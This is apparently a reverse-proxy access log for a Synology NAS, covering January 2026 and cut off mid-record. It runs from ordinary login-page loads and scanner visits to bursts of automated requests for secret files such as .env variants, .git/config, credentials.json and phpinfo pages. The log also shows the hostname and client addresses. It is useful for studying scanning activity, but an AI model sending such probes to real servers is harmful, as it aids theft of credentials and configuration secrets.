(KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/taskbar/dist/dsm.taskbar.bundle.js?v=1661421011" [Client 84.1.26.27] [Length 32255] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/synoSDSjslib/vendor.js?v=1654081517" [Client 84.1.26.27] [Length 19196] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/scripts/syno-vue-components/syno-vue-components.min.js?v=1652869476" [Client 84.1.26.27] [Length 231162] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/synoSDSjslib/sds.js?v=1678269761" [Client 84.1.26.27] [Length 92855] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/sds/dist/dsm.common.bundle.js?v=1661421011" [Client 84.1.26.27] [Length 19433] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/desktop/dist/dsm.desktop.bundle.js?v=1661421011" [Client 84.1.26.27] [Length 22969] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/sds/dist/dsm.sds.bundle.js?v=1661421011" [Client 84.1.26.27] [Length 14204] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/login/dist/dsm.login.bundle.js?v=1661421011" [Client 84.1.26.27] [Length 8796] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:55 +0000] - 200 200 - GET https profibot.synology.me "/webman/entry/dist/dsm.entry.bundle.js?v=1661421011" [Client 84.1.26.27] [Length 783] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/favicon.ico?v=40438" [Client 84.1.26.27] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:56 +0000] - 200 200 - GET https profibot.synology.me "/scripts/noise/noise-c.wasm" [Client 84.1.26.27] [Length 159335] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/resources/images/icon_dsm_32.png?v=40438" [Client 84.1.26.27] [Length 752] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/login/dist/2.style.css" [Client 84.1.26.27] [Length 1467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/login/dist/dsm.login.bundle.f858f097e152553e708d.2.js" [Client 84.1.26.27] [Length 12146] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/login/dist/dsm.login.bundle.289c3033f46c70d66aa1.5.js" [Client 84.1.26.27] [Length 2871] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:56 +0000] - 200 200 - POST https profibot.synology.me "/webapi/entry.cgi/SYNO.API.Auth.UIConfig" [Client 84.1.26.27] [Length 11897] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/login/dist/assets/8d1c89b16774eaa1ed64129f6e5a33da.png" [Client 84.1.26.27] [Length 363] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/webman/login/dist/style.css?v=1661421011" +[13/Jan/2026:11:07:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SecureSignIn/login-dist/SecureSignInLogin.css?v=1.0.8-0197" [Client 84.1.26.27] [Length 11226] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SecureSignIn/login-dist/SecureSignInLogin.js?v=1.0.8-0197" [Client 84.1.26.27] [Length 100237] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:11:07:56 +0000] - 200 200 - GET https profibot.synology.me "/webman/login_background.jpg?id=1" [Client 84.1.26.27] [Length 393403] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[13/Jan/2026:19:44:30 +0000] - - 301 - GET http profibot.synology.me "/" [Client 121.127.34.151] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8)" "-" +[13/Jan/2026:19:44:30 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 121.127.34.151] [Length 12685] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8)" "http://profibot.synology.me/" +[14/Jan/2026:06:55:26 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 167.94.138.50] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[14/Jan/2026:06:55:42 +0000] - 200 200 - GET https profibot.synology.me "/webman/favicon.ico?v=40438" [Client 167.94.138.50] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[14/Jan/2026:06:55:46 +0000] - 200 200 - GET https profibot.synology.me "/webman/resources/images/icon_dsm_96.png?v=40438" [Client 167.94.138.50] [Length 2271] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[14/Jan/2026:06:55:59 +0000] - 200 200 - GET https profibot.synology.me "/webman/resources/images/icon_dsm_48.png?v=40438" [Client 167.94.138.50] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[14/Jan/2026:06:56:05 +0000] - 200 200 - GET https profibot.synology.me "/webman/resources/images/icon_dsm_32.png?v=40438" [Client 167.94.138.50] [Length 752] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[14/Jan/2026:07:12:53 +0000] - - 301 - GET http profibot.synology.me "/" [Client 167.94.138.194] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[14/Jan/2026:13:10:52 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 204.76.203.25] [Length 12685] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[15/Jan/2026:03:11:15 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 3.20.201.240] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[15/Jan/2026:03:11:18 +0000] - - 301 - GET http profibot.synology.me "/" [Client 3.20.201.240] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[15/Jan/2026:03:11:18 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 3.20.201.240] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "http://profibot.synology.me/" +[15/Jan/2026:05:07:35 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 198.12.106.59] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15" "-" +[15/Jan/2026:07:32:48 +0000] - 403 403 - GET https profibot.synology.me "/.git/config" [Client 195.178.110.191] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" "-" +[16/Jan/2026:17:05:51 +0000] - - 301 - GET http profibot.synology.me "/" [Client 23.95.96.140] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15" "-" +[16/Jan/2026:17:05:51 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 23.95.96.140] [Length 2850] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15" "http://profibot.synology.me/" +[16/Jan/2026:20:32:40 +0000] - - 301 - GET http profibot.synology.me "/" [Client 136.118.250.251] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[16/Jan/2026:20:32:43 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 136.118.250.251] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "http://profibot.synology.me" +[17/Jan/2026:01:52:31 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 179.56.56.218] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[17/Jan/2026:01:52:32 +0000] - 404 404 - GET https profibot.synology.me "/favicon.ico" [Client 177.38.112.145] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0" "-" +[17/Jan/2026:07:31:22 +0000] - 200 200 - GET https profibot.synology.me "/robots.txt" [Client 138.246.253.24] [Length 26] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36" "-" +[18/Jan/2026:05:16:21 +0000] - - 301 - GET http profibot.synology.me "/" [Client 165.22.127.166] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[18/Jan/2026:05:16:21 +0000] - - 301 - GET http profibot.synology.me "/favicon.ico" [Client 165.22.127.166] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "http://profibot.synology.me/" +[18/Jan/2026:05:16:21 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 165.22.127.166] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[18/Jan/2026:05:16:22 +0000] - 200 200 - GET https profibot.synology.me "/webman/favicon.ico" [Client 165.22.127.166] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "https://profibot.synology.me/" +[18/Jan/2026:05:46:35 +0000] - 200 200 - HEAD https profibot.synology.me "/" [Client 45.148.10.23] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0" "-" +[18/Jan/2026:05:46:37 +0000] - 403 403 - GET https profibot.synology.me "/.env.prod" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:37 +0000] - 403 403 - GET https profibot.synology.me "/.env.aws" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:37 +0000] - 403 403 - GET https profibot.synology.me "/.phpinfo" [Client 45.148.10.23] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:37 +0000] - 404 404 - GET https profibot.synology.me "/config.php.bak" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:37 +0000] - 404 404 - GET https profibot.synology.me "/server-status" [Client 45.148.10.23] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:37 +0000] - 404 404 - GET https profibot.synology.me "/phpinfo.php" [Client 45.148.10.23] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:37 +0000] - 404 404 - GET https profibot.synology.me "/secrets.json" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:37 +0000] - 403 403 - GET https profibot.synology.me "/.env" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:37 +0000] - 404 404 - GET https profibot.synology.me "/wp-config.php.bak" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; SecurityScanner/1.0)" "-" +[18/Jan/2026:05:46:37 +0000] - 404 404 - GET https profibot.synology.me "/i.php" [Client 45.148.10.23] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[18/Jan/2026:05:46:38 +0000] - 403 403 - GET https profibot.synology.me "/.env.test" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:38 +0000] - 404 404 - GET https profibot.synology.me "/info.php" [Client 45.148.10.23] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:38 +0000] - 404 404 - GET https profibot.synology.me "/status.php" [Client 45.148.10.23] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[18/Jan/2026:05:46:38 +0000] - 404 404 - GET https profibot.synology.me "/test.php" [Client 45.148.10.23] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:38 +0000] - 404 404 - GET https profibot.synology.me "/config.json" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:38 +0000] - 404 404 - GET https profibot.synology.me "/phpinfo" [Client 45.148.10.23] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; SecurityScanner/1.0)" "-" +[18/Jan/2026:05:46:38 +0000] - 404 404 - GET https profibot.synology.me "/credentials.json" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:38 +0000] - 403 403 - GET https profibot.synology.me "/.env.dev" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[18/Jan/2026:05:46:38 +0000] - 403 403 - GET https profibot.synology.me "/.env.local" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:38 +0000] - 403 403 - GET https profibot.synology.me "/.env.staging" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; SecurityScanner/1.0)" "-" +[18/Jan/2026:05:46:40 +0000] - 403 403 - GET https profibot.synology.me "/config/.env" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:40 +0000] - 404 404 - GET https profibot.synology.me "/api/swagger.json" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:40 +0000] - 404 404 - GET https profibot.synology.me "/index.php" [Client 45.148.10.23] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:40 +0000] - 404 404 - GET https profibot.synology.me "/index.php?debug=phpinfo" [Client 45.148.10.23] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; SecurityScanner/1.0)" "-" +[18/Jan/2026:05:46:40 +0000] - 404 404 - GET https profibot.synology.me "/test/phpinfo.php" [Client 45.148.10.23] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:40 +0000] - 404 404 - GET https profibot.synology.me "/index.php?phpinfo=1" [Client 45.148.10.23] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:40 +0000] - 404 404 - GET https profibot.synology.me "/configuration.php.bak" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; SecurityScanner/1.0)" "-" +[18/Jan/2026:05:46:40 +0000] - 403 403 - GET https profibot.synology.me "/.env.cache" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[18/Jan/2026:05:46:40 +0000] - 404 404 - GET https profibot.synology.me "/config/secrets.env" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[18/Jan/2026:05:46:40 +0000] - 403 403 - GET https profibot.synology.me "/.env.queue" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:40 +0000] - 404 404 - GET https profibot.synology.me "/app/phpinfo.php" [Client 45.148.10.23] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:40 +0000] - 404 404 - GET https profibot.synology.me "/config/database.php.bak" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:40 +0000] - 403 403 - GET https profibot.synology.me "/storage/.env" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:40 +0000] - 404 404 - GET https profibot.synology.me "/dev/phpinfo.php" [Client 45.148.10.23] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:40 +0000] - 404 404 - GET https profibot.synology.me "/public/phpinfo.php" [Client 45.148.10.23] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[18/Jan/2026:05:46:40 +0000] - 403 403 - GET https profibot.synology.me "/bootstrap/.env" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:40 +0000] - 403 403 - GET https profibot.synology.me "/apps/web/.env" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:40 +0000] - 404 404 - GET https profibot.synology.me "/app/info.php" [Client 45.148.10.23] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:40 +0000] - 403 403 - GET https profibot.synology.me "/packages/api/.env" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; SecurityScanner/1.0)" "-" +[18/Jan/2026:05:46:40 +0000] - 404 404 - GET https profibot.synology.me "/sites/default/settings.php.bak" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[18/Jan/2026:05:46:40 +0000] - 404 404 - GET https profibot.synology.me "/main.js" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[18/Jan/2026:05:46:40 +0000] - 403 403 - GET https profibot.synology.me "/k8s/.env" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:40 +0000] - 404 404 - GET https profibot.synology.me "/admin/phpinfo.php" [Client 45.148.10.23] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:40 +0000] - 403 403 - GET https profibot.synology.me "/docker/.env" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:40 +0000] - 404 404 - GET https profibot.synology.me "/admin/phpinfo" [Client 45.148.10.23] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:40 +0000] - 404 404 - GET https profibot.synology.me "/config.php.old" [Client 45.148.10.23] [Length 